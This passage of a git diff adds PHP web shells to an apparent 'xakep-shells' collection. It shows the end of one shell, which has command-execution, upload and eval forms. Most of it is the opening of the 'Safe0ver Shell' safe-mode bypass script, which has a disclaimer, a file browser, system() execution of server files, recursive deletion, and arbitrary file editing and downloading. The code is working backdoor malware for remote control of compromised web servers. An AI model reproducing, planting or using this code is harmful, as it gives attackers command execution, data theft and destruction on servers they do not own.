+echo "</textarea>".(($action_edit) ? "<br>".button("  Save  ").hidden("fname",$fname):"")."</center></td></form></tr>
+<tr><form method=post><td class=\"pad\" $hsplit><center>".hidden("action","cmd")."<table><tr><td width=80>Command:&nbsp;</td><td>".edit(85,"cmd","")."</td></tr><tr><td>Location:&nbsp;</td><td>".edit(85,"pwd",$location)."&nbsp;".button("Execute")."</td></tr></table></center></td></form></tr>
+<tr><form method=post><td class=\"pad\" $hsplit><center>".hidden("action","edit").hidden_pwd()."<table><tr><td width=80>Edit file:</td><td>".edit(85,"fname",$location)."</td><td>".button("    Edit    ")."</td></table></center></td></form></tr>
+
+<tr><form method=post><td class=\"pad\" $hsplit><table width=100%><tr><td width=50% $vsplit>".
+  hidden("action","download").hidden_pwd()."<center><table><tr><td width=80>File:</td><td>".edit(50,"fname",$location)."</td><td>".button("Download")."</td></tr></table></center>
+</td></form><form method=post enctype=multipart/form-data><td class=\"pad\" width=50%>".
+  hidden("action","upload").hidden_pwd()."<center><table><tr><td width=80>File:</td><td><input type=file size=50 name=file></td></tr><tr><td>To file:</td><td>".edit(50,"fname",$location)."&nbsp;".button("Upload")."</td></tr></table></center>
+</td></tr></table></td></form></tr>
+
+<tr><form method=post><td class=\"pad\" $hsplit>".hidden("action","eval").hidden_pwd()."<center><textarea cols=100 rows=4 wrap=off name=code></textarea><br>".button("   Eval   ")."</center></td></form></tr>
+<tr><td align=right>Coded by drmist | <a href=\"http://drmist.ru\">http://drmist.ru</a> | <a href=\"http://www.security-teams.net\">http://www.security-teams.net</a> | <a href=\"http://www.security-teams.net/index.php?showtopic=3429\">not enough functions?</a> | (c) 2006 [STNC]</td></tr></table></body>";
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt b/xakep-shells/PHP/Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt
new file mode 100644
index 0000000..34d7f7c
--- /dev/null
+++ b/xakep-shells/PHP/Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt	
@@ -0,0 +1,950 @@
+<?php 
+
+
+/*
+*****************************************************************************************
+*                           Safe0ver Shell //Safe Mod Bypass By Evilc0der                *
+***************************************************************************************** 
+*        Evilc0der.org is a Platform Which You can Publish Your Shell Script             *  
+
+***************************************************************************************** 
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+!!   Dikkat ! Script Egitim Amacli Yazilmistir.Scripti Kullanarak Yapacaginiz Illegal eylemlerden sorumlu Degiliz. 
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+*/ 
+
+
+/*Setting some envirionment variables...*/ 
+
+/* I added this to ensure the script will run correctly...
+   Please enter the Script's filename in this variable. */   
+$SFileName=$PHP_SELF;
+
+/* uncomment the two following variables if you want to use http
+   authentication. This will password protect your PHPShell */
+//$http_auth_user = "phpshell";    /* HTTP Authorisation username, uncomment if you want to use this */
+//$http_auth_pass = "phpshell";    /* HTTP Authorisation password, uncomment if you want to use this */        
+
+error_reporting(0);
+$PHPVer=phpversion();
+$isGoodver=(intval($PHPVer[0])>=4);
+$scriptTitle = "Safe0ver";
+$scriptident = "$scriptTitle By Evilc0der.org";
+
+$urlAdd = "";
+$formAdd = "";
+
+function walkArray($array){
+  while (list($key, $data) = each($array))
+    if (is_array($data)) { walkArray($data); }
+    else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
+}
+
+if (isset($_PUT)) walkArray($_PUT);
+if (isset($_GET)) walkArray($_GET);
+if (isset($_POST)) walkArray($_POST);
+
+
+$pos = strpos($urlAdd, "s=r");
+if (strval($pos) != "") {
+$urlAdd= substr($urlAdd, 0, $pos);
+}
+
+$urlAdd .= "&s=r&";
+
+if (empty($Pmax))
+    $Pmax = 125;   /* Identifies the max amount of Directories and files listed on one page */
+if (empty($Pidx)) 
+    $Pidx = 0;
+
+$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
+$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+
+$scriptdate = "7 Subat 2007";
+$scriptver = "Bet@ Versiyon";
+$LOCAL_IMAGE_DIR = "img";
+$REMOTE_IMAGE_URL = "img";
+$img = array(
+                "Edit"         => "edit.gif",
+                "Download"     => "download.gif",
+                "Upload"     => "upload.gif",
+                "Delete"     => "delete.gif",
+                "View"         => "view.gif",
+                "Rename"     => "rename.gif",
+                "Move"         => "move.gif",
+                "Copy"         => "copy.gif",
+                "Execute"     => "exec.gif"
+            );
+
+while (list($id, $im)=each($img))
+    if (file_exists("$LOCAL_IMAGE_DIR/$im"))
+        $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
+    else
+         $img[$id] = "[$id]";
+
+
+
+
+/* HTTP AUTHENTICATION */
+
+    if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass)  ||  (($logoff==1) && $noauth=="yes")  )   { 
+        setcookie("noauth","");
+        Header( "WWW-authenticate:  Basic realm=\"$scriptTitle $scriptver\"");
+        Header( "HTTP/1.0  401  Unauthorized");
+        echo "Your username or password is incorrect";
+        exit ;
+                 
+    } 
+
+function buildUrl($display, $url) {
+        global $urlAdd;
+        $url = $SFileName . "?$urlAdd$url";
+    return "<a href=\"$url\">$display</a>";
+}
+
+function sp($mp) {
+    for ( $i = 0; $i < $mp; $i++ )
+        $ret .= "&nbsp;";
+    return $ret;
+}
+
+function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr);  } 
+
+function Mydeldir($Fdir) {
+    if (is_dir($Fdir)) {
+        $Fh=@opendir($Fdir);
+         while ($Fbuf = readdir($Fh))
+             if (($Fbuf != ".") && ($Fbuf != ".."))
+                Mydeldir("$Fdir/$Fbuf");
+        @closedir($Fh);
+                return rmdir($Fdir);
+    }    else {
+        return unlink($Fdir);
+    }
+}
+
+
+function arrval ($array) {
+list($key, $data) = $array;
+return $data;
+}
+
+function formatsize($insize) {  
+    $size = $insize;
+    $add = "B";
+    if ($size > 1024) {
+         $size = intval(intval($size) / 1.024)/1000;
+         $add = "KB";
+     }
+     if ($size > 1024) {
+         $size = intval(intval($size) / 1.024)/1000;
+         $add = "MB";
+     }
+     if ($size > 1024) {
+         $size = intval(intval($size) / 1.024)/1000;
+         $add = "GB";
+     }
+     if ($size > 1024) {
+         $size = intval(intval($size) / 1.024)/1000;
+         $add = "TB";
+     }
+     return "$size $add";
+}
+
+if ($cmd != "downl") {
+    ?>
+
+<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?>  -->
+<HTML>
+ <HEAD>
+  <STYLE>
+  <!--
+    A{ text-decoration:none; color:navy; font-size: 12px }
+    body {
+	font-size: 12px;
+	font-family: arial, helvetica;
+	scrollbar-width: 5;
+	scrollbar-height: 5;
+	scrollbar-face-color: white;
+	scrollbar-shadow-color: silver;
+	scrollbar-highlight-color: white;
+	scrollbar-3dlight-color:silver;
+	scrollbar-darkshadow-color: silver;
+	scrollbar-track-color: white;
+	scrollbar-arrow-color: black;
+	background-color: #CCCCCC;
+    }
+    Table { font-size: 12px; }
+    TR{ font-size: 12px; }
+    TD{
+	font-size: 12px;
+	font-family: arial, helvetical;
+	BORDER-LEFT: black 0px solid;
+	BORDER-RIGHT: black 0px solid;
+	BORDER-TOP: black 0px solid;
+	BORDER-BOTTOM: black 0px solid;
+	COLOR: black;
+	background: #CCCCCC;
+    }
+    .border{       BORDER-LEFT: black 1px solid;
+            BORDER-RIGHT: black 1px solid;
+            BORDER-TOP: black 1px solid;
+            BORDER-BOTTOM: black 1px solid;
+          }
+    .none  {       BORDER-LEFT: black 0px solid;
+            BORDER-RIGHT: black 0px solid;
+            BORDER-TOP: black 0px solid;
+            BORDER-BOTTOM: black 0px solid;
+          }
+    .inputtext {
+            background-color: #EFEFEF;
+            font-family: arial, helvetica;
+            border: 1px solid #000000;
+            height: 20;
+    }
+    .lighttd {       background: #F8F8F8;
+    }
+    .darktd {        background: #CCCCCC;
+    }
+    input { font-family: arial, helvetica;
+    }
+    .inputbutton {
+                        background-color: #CCCCCC;
+            border: 1px solid #000000;
+            border-width: 1px;
+            height: 20;
+    }
+    .inputtextarea {
+            background-color: #CCCCCC;
+            border: 1px solid #000000;
+            scrollbar-width: 5;
+            scrollbar-height: 5;
+            scrollbar-face-color: #EFEFEF;
+            scrollbar-shadow-color: silver;
+            scrollbar-highlight-color: #EFEFEF;
+            scrollbar-3dlight-color:silver;
+            scrollbar-darkshadow-color: silver;
+            scrollbar-track-color: #EFEFEF;
+            scrollbar-arrow-color: black;
+    }
+    .top { BORDER-TOP: black 1px solid; }
+    .textin { BORDER-LEFT: silver 1px solid;
+              BORDER-RIGHT: silver 1px solid;
+           BORDER-TOP: silver 1px solid;
+              BORDER-BOTTOM: silver 1px solid;
+              width: 99%; font-size: 12px; font-weight: bold; color: Black;
+            }
+    .notop { BORDER-TOP: black 0px solid; }
+    .bottom { BORDER-BOTTOM: black 1px solid; }
+    .nobottom { BORDER-BOTTOM: black 0px solid; }
+    .left { BORDER-LEFT: black 1px solid; }
+    .noleft { BORDER-LEFT: black 0px solid; }
+    .right { BORDER-RIGHT: black 1px solid; }
+    .noright { BORDER-RIGHT: black 0px solid; }
+    .silver{ BACKGROUND: #CCCCCC; }
+body,td,th {
+	color: #660000;
+}
+a:link {
+	color: #000000;
+	text-decoration: none;
+}
+a:hover {
+	color: #00FF00;
+	text-decoration: none;
+}
+a:active {
+	color: #666666;
+	text-decoration: none;
+}
+a:visited {
+	text-decoration: none;
+}
+.style5 {
+	color: #660000;
+	font-weight: bold;
+}
+  -->
+  </STYLE>
+  <TITLE><?php echo $SFileName ?></TITLE>
+ <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD>
+ <body topmargin="0" leftmargin="0">
+ <div style="position: absolute; background: #CCCCCC; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
+ <table nowrap width=100% border="0" cellpadding="0" cellspacing="0">
+   <tr>
+     <td width="100%" class="silver border"><center>
+         <strong> <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font> </strong>
+     </center></td>
+   </tr>
+ </table>
+ <table width=100% height="100%" NOWRAP border="0">
+  <tr NOWRAP>
+   <td width="100%" NOWRAP><br>
+
+    <?php
+}
+
+if ( $cmd=="dir" ) {
+      $h=@opendir($dir);
+     if ($h == false) {
+          echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
+                Klas�r Listelenemiyor!L�tfen Bypass B�l�m�n� Deneyin.<br>".sp(3)."\n
+                Script Gecisi Tamamlayamadi!
+                <br><br>".sp(3)."\n
+                Klas�re Girmek Icin yetkiniz Olduguna emin Olunuz...
+                <br><br></font>\n\n\n\n";
+     }
+        if (function_exists('realpath')) {
+        $partdir = realpath($dir);
+    }
+        else {
+        $partdir = $dir;
+    }
+     if (strlen($partdir) >= 100) {
+         $partdir = substr($partdir, -100);
+         $pos = strpos($partdir, "/");
+         if (strval($pos) != "") {
+             $partdir = "<--   ...".substr($partdir, $pos);
+         }
+        $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
+        $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); 
+    $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+     }
+    ?>
+      <form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
+         <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
+      <tr>
+       <td width="100%" class="silver border">
+        <center>&nbsp;Safe0ver-Server File Browser...&nbsp;</center>
+       </td>
+      </tr>
+     </table>
+       <br>
+     <table width="100%" border="0" cellpadding="0" cellspacing="0">
+      <tr>
+           <td class="border nobottom noright">
+            &nbsp;Listeliyor:&nbsp;
+      </td>
+          <td width="100%" class="border nobottom noleft">
+           <table width="100%" border="0" cellpadding="1" cellspacing="0">
+             <tr>
+              <td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
+              <td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GiT<b></a>&nbsp;<center></td>
+             </tr>
+            </table>
+            
+      </td>
+     </tr>
+    </table>
+  <!--    </form>   -->
+        <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
+         <tr>
+      <td width="100%" NOWRAP class="silver border">
+       &nbsp;Dosya Adi&nbsp;
+      </td>
+          <td NOWRAP class="silver border noleft">
+       &nbsp;Yapilabilecekler&nbsp;&nbsp;
+      </td>
+          <td NOWRAP class="silver border noleft">
+       &nbsp;Boyut&nbsp;
+      </td>
+          <td width=1 NOWRAP class="silver border noleft">
+       &nbsp;Yetkiler&nbsp;
+      </td>
+          <td NOWRAP class="silver border noleft">
+       &nbsp;Son D�zenleme&nbsp;
+      </td>
+     <tr>
+    <?php
+
+
+          /* <!-- This whole heap of junk is the sorting section... */
+
+     $dirn     = array();
+     $filen     = array();
+     $filesizes    = 0;
+     while ($buf = readdir($h)) {
+        if (is_dir("$dir/$buf"))
+            $dirn[] = $buf;
+            else 
+             $filen[] = $buf;
+        }         
+        $dirno     = count($dirn) + 1;
+         $fileno    = count($filen) + 1;
+
+          function mycmp($a, $b){
+            if ($a == $b) return 0;
+            return (strtolower($a) < strtolower($b)) ? -1 : 1;
+        }
+
+        if (function_exists("usort")) {
+            usort($dirn, "mycmp");
+            usort($filen, "mycmp");
+        }
+        else {
+            sort ($dirn);
+             sort ($filen);
+         }
+    reset ($dirn);
+     reset ($filen);
+     if (function_exists('array_merge')) {
+        $filelist = array_merge ($dirn, $filen);
+    }
+     else {
+        $filelist = $dirn + $filen;
+    }
+
+    
+    if ( count($filelist)-1 > $Pmax ) {
+        $from = $Pidx * $Pmax;
+        $to = ($Pidx + 1) * $Pmax-1;
+        if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
+            $to = count($filelist) - 1;
+        if ($to > count($filelist)-1)
+            $to = count($filelist)-1;
+        $Dcontents = array();
+        For ($Fi = $from; $Fi <= $to; $Fi++) {
+            $Dcontents[] = $filelist[$Fi];    
+        }
+
+    }
+    else {
+        $Dcontents = $filelist;
+    }
+    
+     $tdcolors = array("lighttd", "darktd");
+
+     while (list ($key, $file) = each ($Dcontents)) {
+          if (!$tdcolor=arrval(each($tdcolors))) {
+        reset($tdcolors);
+        $tdcolor = arrval(each($tdcolors));      }
+                   
+         if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */
+                      /* <!-- Dirname --> */
+            echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n";
+                  /* <!-- Actions --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
+                 /* <!-- Rename --> */
+            if ( ($file != ".") && ($file != "..") )
+                echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+                 /* <!-- Delete --> */
+            if ( ($file != ".") && ($file != "..") )
+                echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+                /* <!-- End of Actions --> */
+            echo "&nbsp;&nbsp;</center></td>\n";
+                  /* <!-- Size --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n";
+                 /* <!-- Attributes --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+             echo "<strong>D</strong>";
+                if ( @is_readable("$dir/$file") ) {
+                   echo "<strong>R</strong>";
+             }
+             if (function_exists('is_writeable')) {
+                if ( @is_writeable("$dir/$file") ) {
+                     echo "<strong>W</stong>";
+                 }
+            }
+             else {
+                    echo "<strong>(W)</stong>";
+              }
+              if ( @is_executable("$dir/$file") ) {
+                 echo "<Strong>X<strong>";
+             }
+             echo "&nbsp;&nbsp;</td>\n";
+                 /* <!-- Date --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+             echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+             echo "</td>";
+            echo "</tr>\n";
+
+            }
+          else { /* <!-- Then it must be a File... --> */
+                     /* <!-- Filename --> */
+            if ( @is_readable("$dir/$file") )
+                 echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n";
+              else
+                  echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
+                                 /* <!-- Actions --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n";
+                 /* <!-- Rename --> */
+            echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+                  /* <!-- Edit --> */
+            if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+                 echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n";
+                   /* <!-- Copy --> */
+             echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n";
+                  /* <!-- Move --> */
+            if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+                     echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n";
+                    /* <!-- Delete --> */
+            echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+                 /* <!-- Download --> */
+            echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n";
+                 /* <!-- Execute --> */
+            if ( @is_executable("$dir/$file") )
+                 echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n";
+                    /* <!-- End of Actions --> */
+            echo sp(2)."</center></td>\n";
+                 /* <!-- Size --> */
+            echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
+             $size = @filesize("$dir/$file");
+             If ($size != false) {
+                    $filesizes += $size;
+                echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>";
+            }
+            else
+                echo "&nbsp;&nbsp;<strong>0 B<strong>";
+             echo "&nbsp;&nbsp;</td>\n";
+
+                 /* <!-- Attributes --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+
+             if ( @is_readable("$dir/$file") )
+                 echo "<strong>R</strong>";
+               if ( @is_writeable("$dir/$file") )
+                 echo "<strong>W</stong>";
+               if ( @is_executable("$dir/$file") )
+                 echo "<Strong>X<strong>";
+               if (function_exists('is_uploaded_file')){
+                 if ( @is_uploaded_file("$dir/$file") )
+                     echo "<Strong>U<strong>";
+             }
+             else {
+                echo "<Strong>(U)<strong>";
+            }
+             echo "&nbsp;&nbsp;</td>\n";
+                 /* <!-- Date --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+             echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+             echo "</td>";
+             echo "</tr>\n";
+         }
+      }
+
+        echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
+      echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Klas�r,&nbsp;".@count ($filen)."&nbsp;Dosya&nbsp;&nbsp;\n";
+      echo "</td><td NOWRAP class=\"silver border noleft\">\n";
+      echo "&nbsp;&nbsp;Toplam Dosya Boyutu:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
+    
+    function printpagelink($a, $b, $link = ""){
+        if ($link != "") 
+            echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
+        else
+            echo "<b>| $a - $b |</b>";
+    }
+        
+    if ( count($filelist)-1 > $Pmax ) {
+        echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
+        $Fi = 0;
+        while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
+            $from = $Fi*$Pmax;
+            while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+            $to = ($Fi + 1) * $Pmax - 1;
+            if ($Fi == $Pidx)
+                $link="";
+            else 
+                $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+            printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
+            echo "&nbsp;&nbsp;&nbsp;";
+            $Fi++;
+        }
+        $from = $Fi*$Pmax;
+        while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+        $to = count($filelist)-1;
+        if ($Fi == $Pidx)
+            $link="";
+        else 
+            $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+        printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);        
+        
+    
+        echo "</center></td></tr></table></td></tr>";
+    }
+
+
+        echo "</table>\n<br><table NOWRAP>";
+
+      if ($isGoodver) {
+        echo "<tr><td class=\"silver border\">&nbsp;<strong>PHP Versiyonu:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n";
+    }
+     else {
+        echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n";
+    }
+              /* <!-- Other Actions --> */
+       echo "<tr><td class=\"silver border\">&nbsp;<strong>Diger Islemler:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
+      echo "<td>&nbsp;<b>".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+                         buildUrl( "| Yeni Klas�r |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+                 buildUrl( "| Dosya Y�kle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
+        echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
+      echo "<tr><td class=\"silver border\">&nbsp;<strong>IP Adresin:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
+      echo "<tr><td class=\"silver border\">&nbsp;<strong>Bulundugun Klas�r:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
+      echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Semboller:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
+      echo "<table NOWRAP>";
+        echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Klas�r.</td></tr>\n";
+       echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Okunabilir.</td></tr>\n";
+      echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Yazilabilir.</td></tr>\n";
+      echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Komut Calistirilabilir.</td></tr>\n";
+      echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n";
+      echo "</table></td>";
+     echo "</table>";
+     echo "<br>";
+         @closedir($h);
+  }
+  elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
+     echo system("$file");
+ }
+elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
+    echo "<center><table><tr><td NOWRAP>" ;
+     if ($auth == "yes") {
+        if (Mydeldir($file)==false) {
+             echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
+          }
+         else {
+             echo "Successfully removed \"$file\"<br>";
+         }
+         echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\"></form>";
+    }
+     else {
+        echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
+        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+        <input type=\"hidden\" name=\"cmd\" value=\"deldir\">
+         <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+         <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+         <input type=\"hidden\" name=\"file\" value=\"$file\">
+         <input type=\"hidden\" name=\"auth\" value=\"yes\">
+         <input type=\"submit\" value=\"Yes\"></form>
+        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+    <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+    <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+    <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+        }
+     echo "</td></tr></center>";
+}
+ elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */    echo "<center><table><tr><td NOWRAP>" ;
+     if ($auth == "yes") {
+        if (@unlink($file)==false) {
+             echo "Could not remove \"$file\"<br>";
+          }
+         else {
+             echo "Successfully removed \"$file\"<br>";
+         }
+        echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\"></form>";
+        }
+     else {
+           echo "Are you sure you want to delete \"$file\" ?
+          <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+         <input type=\"hidden\" name=\"cmd\" value=\"delfile\">
+         <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+         <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+         <input type=\"hidden\" name=\"file\" value=\"$file\">
+         <input type=\"hidden\" name=\"auth\" value=\"yes\">
+
+         <input type=\"submit\" value=\"Yes\"></form>
+           <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+    <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+    <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+    <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+        }
+     echo "</td></tr></center>";
+}
+elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
+    echo "<center><table><tr><td NOWRAP>";
+     $i = 1;
+     while (file_exists("$lastdir/newfile$i.txt"))
+         $i++;
+     $file = fopen("$lastdir/newfile$i.txt", "w+");
+     if ($file == false)
+         echo "Could not create the new file...<br>";
+     else
+         echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
+         echo "
+               <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+            <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+            <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+            <input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\">
+            </form></center>
+             </td></tr></table></center>           ";
+    }
+elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
+    echo "<center><table><tr><td NOWRAP>" ;
+     $i = 1;
+     while (is_dir("$lastdir/newdir$i"))
+          $i++;
+     $file = mkdir("$lastdir/newdir$i", 0777);
+     if ($file == false)
+         echo "Could not create the new directory...<br>";
+     else
+         echo "Successfully created: \"$lastdir/newdir$i\"<br>";
+     echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+        <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+        <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+        <input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\">
+        </form></center></td></tr></table></center>";
+}
+elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
+    $contents = "";
+    $fc = @file( $file );
+      while ( @list( $ln, $line ) = each( $fc ) ) {
+          $contents .= htmlentities( $line ) ;
+     }
+     echo "<br><center><table><tr><td NOWRAP>";
+    echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+    echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
+    echo "<strong>EDIT FILE: </strong>$file<br>\n";
+    echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
+    echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
+    echo "<input type=\"submit\" value=\"Save\">";
+    echo "</form>";
+    echo "</td></tr></table></center>";
+}
+elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
+    $fo = fopen($file, "w");
+    $wrret = fwrite($fo, stripslashes($contents));
+    $clret = fclose($fo);
+}
+elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */
+    $downloadfile = urldecode($file);
+    if (function_exists("basename"))
+            $downloadto = basename ($downloadfile);
+    else
+        $downloadto = "download.ext";
